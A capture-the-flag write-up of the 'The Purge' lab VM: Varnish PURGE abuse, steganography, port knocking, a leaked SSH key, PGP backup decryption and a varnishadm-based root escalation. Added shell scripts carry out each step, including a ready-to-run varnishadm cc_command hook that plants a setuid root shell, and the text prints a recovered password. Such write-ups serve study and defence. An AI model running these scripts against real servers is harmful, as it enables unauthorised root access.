Don’t Answer the Doorbell

The Purge was created by strata, and I can tell you it’s a hassle to complete. But I did, and here’s how!

What’s Running

I don’t want to tell you how to do this bit, so here’s the output.

root@kali:~# nmap -sS -p- -T5 -Pn 172.16.231.134

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-06 22:17 GMT
Nmap scan report for thepurge (172.16.231.134)
Host is up (0.00027s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:AD:9E:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 52.91 seconds
root@kali:~#

Visiting the HTTP server by IP address gives you some instructions telling you to add a hosts entry; once the name thepurge is mapped to the VM’s address in /etc/hosts, the VM can be referenced correctly. So, I hit it with a browser to see what I was faced with.

[Screenshot: thepurge_001]

None of the links on this page work, so I’m stuck just looking at it. Using nc, I saw that the page is served by Apache sitting behind Varnish.

root@kali:~# nc 172.16.231.134 80
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 22:21:12 GMT
Server: Apache
Last-Modified: Fri, 02 Jan 2015 22:52:51 GMT
ETag: "82a-50bb3334896c0"
GovPurGe: Blessed be our New Founding Fathers and America
Content-Type: text/html; charset=UTF-8
X-Varnish: 3
Age: 0
Via: 1.1 varnish-v4
Connection: close
Accept-Ranges: bytes

Varnish is a caching reverse proxy. It has no built-in PURGE method of its own: the stock example VCL shows how to map an HTTP PURGE request onto a cache invalidation, and plenty of deployments copy that without an ACL restricting who may send it, which means any client can force the cached copy of a page to be dropped and re-fetched from the backend. Also note the GovPurGe header.

My next step was to do some enumeration on the page. There are three reviews, one of which is in pseudo-Latin. Four words immediately stood out to me because of their odd capitalisation: Steg, Hide, Varnish and Purge. I already know the server is Varnish, and I know about PURGE. However, steghide implies that something is hidden in an image…

Extracting the hidden data from the image on the page with steghide yields an ominous message… I’ll note that down for later, as it is not needed right now.

There’s nothing else of interest on this page, so I decided to see what would happen if I sent a PURGE request for the main page using curl.

Once the PURGE completed, I visited the page again with a browser, and was presented with different page content.
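The curl step above is shown in the post only as a result. What follows is an added example, not the post’s own command: it fetches the page, sends the PURGE, fetches again, and reads Varnish’s X-Varnish and Age headers to show whether each response came from the cache or the backend. It assumes the name thepurge resolves through the hosts entry, the page is /, and curl is installed; the header samples inside it are constructed to match the nc output above.

```shell
#!/bin/sh
# Added example, not the post's own command. Sends an HTTP PURGE to a Varnish
# front end and reads the next response's cache headers. Assumes the name
# "thepurge" resolves (hosts entry), the page is "/", and curl is installed.

# Classify a response from its X-Varnish and Age headers. Varnish 4 puts one
# transaction id in X-Varnish when the object was fetched from the backend and
# two ids (this request, and the one that stored the object) on a cache hit;
# Age is how many seconds the object has been sitting in the cache.
varnish_cache_state() {
    hdrs=$1                                  # file holding raw response headers
    xv=$(sed -n 's/^X-Varnish: *//p' "$hdrs" | tr -d '\r')
    age=$(sed -n 's/^Age: *//p' "$hdrs" | tr -d '\r')
    set -- $xv                               # split the ids into positional args
    if [ "$#" -ge 2 ]; then
        echo "hit (age ${age:-?}s)"
    elif [ "$#" -eq 1 ]; then
        echo "miss (age ${age:-?}s)"
    else
        echo "not varnish"
    fi
}

# Constructed sample headers: "miss" mirrors the nc output above (X-Varnish: 3,
# Age: 0); "hit" is what a second GET of an already cached object looks like.
sample_headers() {
    case $1 in
        miss) printf 'HTTP/1.1 200 OK\r\nX-Varnish: 3\r\nAge: 0\r\nVia: 1.1 varnish-v4\r\n\r\n' ;;
        hit)  printf 'HTTP/1.1 200 OK\r\nX-Varnish: 5 3\r\nAge: 12\r\nVia: 1.1 varnish-v4\r\n\r\n' ;;
    esac
}

# GET the page, PURGE it, GET it again, and show whether the body changed.
# A cache that honours PURGE from any client lets an anonymous user force the
# backend to be re-fetched at will; here that re-fetch is what reveals new content.
purge_and_diff() {
    url=$1
    tmp=$(mktemp -d)
    curl -s -D "$tmp/before.h" -o "$tmp/before.html" "$url"
    curl -s -o /dev/null -X PURGE "$url"
    curl -s -D "$tmp/after.h" -o "$tmp/after.html" "$url"
    echo "before: $(varnish_cache_state "$tmp/before.h")"
    echo "after:  $(varnish_cache_state "$tmp/after.h")"
    diff -u "$tmp/before.html" "$tmp/after.html" && echo "body unchanged"
    rm -rf "$tmp"
}

# usage (needs the VM): purge_and_diff http://thepurge/
```

The before/after classification is the useful tell when you meet Varnish elsewhere: if a PURGE from an unprivileged client is followed by a miss (single id, Age 0) on a page that was a hit a moment ago, the invalidation is not ACL-restricted.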

[Screenshot: thepurge_002]

Interesting. I also noticed that the image at the bottom of the page, which I had previously run through steghide, now had a different filename. Maybe there’s something different inside it?

Different data, and that’s interesting. The YouTube video linked is Knockin’ on Heaven’s Door by Guns N’ Roses, but the extra characters after the URL are hex, and decode to 2005, 31337, 1995 and 22 in decimal. That looks like a port-knocking sequence that opens SSH (port 22 was among the filtered ports in the scan), but I don’t have any usernames, passwords or private keys to use yet.

Remember the message we obtained from the first JPEG file? “The reviewers are fortunate to have homes in today's purged economic climate.” This hints that we may be able to browse the reviewers’ home directories over HTTP. Comparing the original and purged versions of the front page gives a list of possible users: Bill Williams0n, Zoey Sand1n, James Holmes, Charlie Hanger and Bin Ladin. Of these, only two home directories are accessible.
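The name-to-username step is done by hand in the post. As an added example (not the post’s own commands), the script below derives first-initial-plus-surname login candidates from the names collected above and probes Apache’s per-user directories for each. It assumes mod_userdir maps /~user/ to the user’s public_html (consistent with the public_html directory seen later on the box) and that thepurge resolves through the hosts entry; the list of names is constructed from the two versions of the front page.

```shell
#!/bin/sh
# Added example, not from the post: build first-initial-plus-surname login
# candidates from the names on the site and probe Apache's per-user
# directories. Assumes mod_userdir maps /~user/ to ~user/public_html and that
# "thepurge" resolves via the hosts entry.

# Reads "First Last" names on stdin, prints lower-case candidates, one per line.
username_candidates() {
    awk 'NF >= 2 { print tolower(substr($1, 1, 1) $NF) }'
}

# Constructed input: the five names collected from the original and purged
# front pages.
reviewer_names() {
    printf '%s\n' 'Bill Williams0n' 'Zoey Sand1n' 'James Holmes' 'Charlie Hanger' 'Bin Ladin'
}

# Requests /~user/ for each candidate on stdin and prints the status code.
# Anything other than a 404 is worth a closer look: a 200 is a browsable home
# directory, a 403 usually means the directory exists but Apache may not read it.
probe_userdirs() {
    base=$1
    while read -r u; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$base/~$u/")
        printf '%-12s %s\n' "$u" "$code"
    done
}

# usage (needs the VM): reviewer_names | username_candidates | probe_userdirs http://thepurge
```

The candidate rule is a guess about the site’s convention; bwilliams0n and zsand1n both follow it, which is why it is worth trying before anything fancier.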

http://thepurge/~bwilliams0n

[Screenshot: thepurge_003]

What an interesting YouTube video.

However, the HTML source is much more interesting

<html>
<head>
  <title>Bill Williamson</title>
</head>
<body bgcolor="black">
  <center>
    <embed width="840" height="620" src="http://www.youtube.com/v/vca7c04r95I">
  </center>
</body>
<!--
For the glory of sshaitan, of course!
-->

This didn’t tell me much, so I decided to PURGE it too using the curl command from earlier. This resulted in the following page being made available

[Screenshot: thepurge_004]

The YouTube video is even weirder, but the source changed too.

<html>
<head>
  <title>Bill Williamson</title>
</head>
<body bgcolor="black">
  <center>
    <embed width="840" height="620" src="http://www.youtube.com/v/uV-V1FqaEk8">
  </center>
</body>
<!--
-----BEGIN DSA PRIVATE KEY-----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-----END DSA PRIVATE KEY-----
-->

That, to me, looks like a private key. So, back to port knocking.

Who’s There

Once the private key has been saved to a file with its permissions set to 600 (ssh refuses to use a key that is group- or world-readable), I used knocker to hit the four ports in order, after which port 22 opened and SSH access as bwilliams0n was possible.
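The post decodes the hex by hand and knocks with the knocker tool. As an added example covering both that decoding step and this knock-then-ssh step (not the post’s own commands), the script below converts hex tokens to ports, knocks them in order with nc, and connects with the recovered key. The tokens in the usage line are the hex forms of the four decimal values the post gives (2005, 31337, 1995, 22), not the literal string from the page; the host name, the user bwilliams0n and the key file name are assumptions taken from the post.

```shell
#!/bin/sh
# Added example, not the post's own commands: decode the hex tokens into a
# knock sequence, knock, then connect with the recovered key. The hex tokens
# are the hex forms of the four decimal values given in the post, not the
# literal string from the page; nc and ssh are assumed to be installed.

# Hex tokens in, decimal ports out (space-separated, same order).
decode_ports() {
    out=""
    for h in "$@"; do
        out="$out${out:+ }$((0x$h))"
    done
    printf '%s\n' "$out"
}

# One connection attempt per port, in order. The ports are filtered, so nc
# fails every time; the SYN is the knock and the failure is expected.
knock() {
    host=$1; shift
    for p in "$@"; do
        nc -z -w 1 "$host" "$p" 2>/dev/null || true
        sleep 1
    done
}

# Fix key permissions (ssh refuses group/world-readable keys), knock, connect.
# The key is DSA: OpenSSH 7.0 and later refuse ssh-dss unless it is re-enabled,
# and the newest releases have dropped DSA support altogether, so an older
# client (or a container holding one) may be needed. Set SSH_OPTS to an empty
# string on a pre-7.0 client, which does not know the option.
SSH_OPTS=${SSH_OPTS--o PubkeyAcceptedKeyTypes=+ssh-dss}
ssh_after_knock() {
    host=$1; user=$2; key=$3; shift 3
    chmod 600 "$key"
    knock "$host" "$@"
    ssh -i "$key" -o IdentitiesOnly=yes $SSH_OPTS "$user@$host"
}

# usage (needs the VM):
# ssh_after_knock thepurge bwilliams0n ./bwilliams0n_dsa $(decode_ports 7d5 7a69 7cb 16)
```

The one-second pause between knocks is deliberate: knock daemons typically require the sequence within a window but also in strict order, and firing all four SYNs at once can let them arrive out of order.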

So, now I have a shell. More enumeration required! Wandering around the file system shows that bwilliams0n can read /home/zsand1n. Within that folder is an archive encrypted with PGP.

[bwilliams0n@thepurge zsand1n]$ ls -la
total 964
drwxr-xr-x. 3 zsand1n zsand1n   4096 Jan  1 23:43 .
drwxr-xr-x. 7 root    root        81 Jan  2 17:57 ..
-rw-r--r--. 1 zsand1n zsand1n     18 Sep 25 21:53 .bash_logout
-rw-r--r--. 1 zsand1n zsand1n    193 Sep 25 21:53 .bash_profile
-rw-r--r--. 1 zsand1n zsand1n    231 Sep 25 21:53 .bashrc
-rw-r--r--. 1 zsand1n zsand1n 964832 Jan  1 23:42 homes-backup-20150101.tar.gz.gpg
drwxrwxr-x. 6 zsand1n zsand1n   4096 Jan  6 14:45 public_html
[bwilliams0n@thepurge zsand1n]$ 

To decrypt this file we need the private half of the PGP key it was encrypted to, plus that key’s passphrase.

There is a file in public_html that contains a PGP public key, but a public key on its own is no help for decryption.

[bwilliams0n@thepurge public_html]$ cat gpg_key.html
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)
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=tVjP
-----END PGP PUBLIC KEY BLOCK-----

Could I use my old friend PURGE and see if the file changes? Why yes, yes I can… and yes, it does change: the purged version carries a private key instead of a public one.

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)
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=ZWQm
-----END PGP PRIVATE KEY BLOCK-----

This can now be imported into GPG and used to decrypt the archive found earlier. Remember the GovPurGe header from earlier? Its value is the passphrase protecting the key.
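The post does not show the GnuPG invocation. As an added example (not the post’s own commands), the script below pulls the passphrase out of a saved copy of the response headers, imports the private key and decrypts and unpacks the backup. It assumes GnuPG 2.1 or later on the attacking box (which needs --pinentry-mode loopback before it will accept --passphrase in batch mode; GnuPG 2.0 takes --passphrase on its own), and that the key block and the archive have been copied to local files with the names shown; the sample headers are constructed to match the nc output earlier.

```shell
#!/bin/sh
# Added example, not the post's commands: take the passphrase from the GovPurGe
# response header, import the private key recovered above and decrypt the
# backup. Assumes GnuPG 2.1+ (hence --pinentry-mode loopback) and local copies
# of the key block and the .gpg archive.

# Prints the value of the GovPurGe header from a file of raw response headers.
gov_purge_header() {
    sed -n 's/^GovPurGe: *//p' "$1" | tr -d '\r'
}

# Constructed sample, matching the nc output earlier in the post.
sample_response_headers() {
    printf 'HTTP/1.1 200 OK\r\nServer: Apache\r\nGovPurGe: Blessed be our New Founding Fathers and America\r\nVia: 1.1 varnish-v4\r\n\r\n'
}

# $1 private key block, $2 encrypted archive, $3 saved headers, $4 work dir
decrypt_backup() {
    key=$1; archive=$2; hdrs=$3; work=$4
    pass=$(gov_purge_header "$hdrs")
    mkdir -p "$work/homes"
    gpg --batch --import "$key"
    gpg --batch --yes --pinentry-mode loopback --passphrase "$pass" \
        --output "$work/homes-backup.tar.gz" --decrypt "$archive"
    tar -xzf "$work/homes-backup.tar.gz" -C "$work/homes"
    # shell histories are where the post found the next credential
    find "$work/homes" -name .bash_history -exec grep -Hn . {} +
}

# usage: curl -s -D hdrs.txt -o /dev/null http://thepurge/
#        decrypt_backup zsand1n.key homes-backup-20150101.tar.gz.gpg hdrs.txt ./loot
```

Passing the passphrase on the command line is fine on a throwaway attack box but leaves it in the process list and shell history; for anything real, feed it via --passphrase-file instead.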

I spent a lot of time looking through the files from this archive, and eventually found a password of “vi.isforleeth@xxors” in the .bash_history file of the jholmes home directory.

That allowed me to su to jholmes and discover that he is allowed to run /usr/bin/varnishadm via sudo. varnishadm is the management CLI for varnishd: whenever a VCL is loaded, varnishd translates it to C and runs the command held in its cc_command parameter to compile it, and in the Varnish 4.0 build on this box that compiler subprocess runs under the uid set by the user parameter. With a few tweaks, then, varnishadm will run an arbitrary command as whatever user varnishd is configured to use, so sudo access to varnishadm is effectively root. The last video shows me switching to the jholmes user, creating a malicious shell script that grabs a copy of the dash binary from my attacking VM (dash does not drop privileges the way bash does, so it makes a much better setuid shell), running sudo varnishadm, setting the user parameter so Varnish runs as root instead of the varnish user, and then pointing the cc_command parameter at the malicious script. The next compile runs it as root, which gives me a setuid root shell and lets me read /FLAG.txt.
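The escalation itself is only on the video, so here is an added reconstruction of it, not the post’s own commands. It assumes what the post states (jholmes may run /usr/bin/varnishadm via sudo, the target is the Varnish 4.0 series, which still has a user parameter, and a dash binary has already been copied onto the target, here at $DASH_SRC); cc_command and user are real Varnish parameter names, while the hook script path, the VCL file and the name pwn are my choices.

```shell
#!/bin/sh
# Added reconstruction of the varnishadm escalation; not the post's commands.
# Assumes: jholmes may run /usr/bin/varnishadm via sudo; Varnish 4.0 series
# (has the "user" parameter); a dash binary already copied to $DASH_SRC.

# Writes the script varnishd will run instead of the C compiler. varnishd
# hands cc_command to /bin/sh -c, so a bare path with no %s/%o placeholders is
# enough; the compile then fails, but only after the script has already run.
write_cc_hook() {
    hook=$1; dash_src=$2
    cat > "$hook" <<EOF
#!/bin/sh
cp "$dash_src" /tmp/rootsh
chown root:root /tmp/rootsh
chmod 4755 /tmp/rootsh
EOF
    chmod 755 "$hook"
}

# The three admin commands, in order: make the uid varnishd drops to for its
# helper processes (the compiler included) root, point the compiler at the
# hook, then load any VCL to trigger a compile. Printed rather than run so the
# sequence can be reviewed; escalate() executes them.
varnishadm_cmds() {
    hook=$1; vcl=$2
    printf '%s\n' \
        "sudo /usr/bin/varnishadm param.set user root" \
        "sudo /usr/bin/varnishadm param.set cc_command $hook" \
        "sudo /usr/bin/varnishadm vcl.load pwn $vcl"
}

escalate() {
    hook=/tmp/cc_hook.sh; vcl=/tmp/pwn.vcl
    write_cc_hook "$hook" "${DASH_SRC:-/tmp/dash}"
    # minimal valid VCL 4.0 so that the load gets as far as compiling
    printf 'vcl 4.0;\nbackend default { .host = "127.0.0.1"; .port = "80"; }\n' > "$vcl"
    varnishadm_cmds "$hook" "$vcl" | while read -r cmd; do
        echo "+ $cmd"
        sh -c "$cmd" || true          # vcl.load reports a compile failure; expected
    done
    # dash keeps the effective uid, so no -p flag is needed (bash would drop it)
    ls -l /tmp/rootsh && /tmp/rootsh -c 'id; cat /FLAG.txt'
}

# usage (on the target, as jholmes): DASH_SRC=/tmp/dash escalate
```

The defensive reading is the same as for any management CLI that can change which program a root-owned daemon executes: a sudo rule for varnishadm with no command restriction is a sudo rule for root, and the param.set commands land in the Varnish CLI log for anyone checking.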

Done.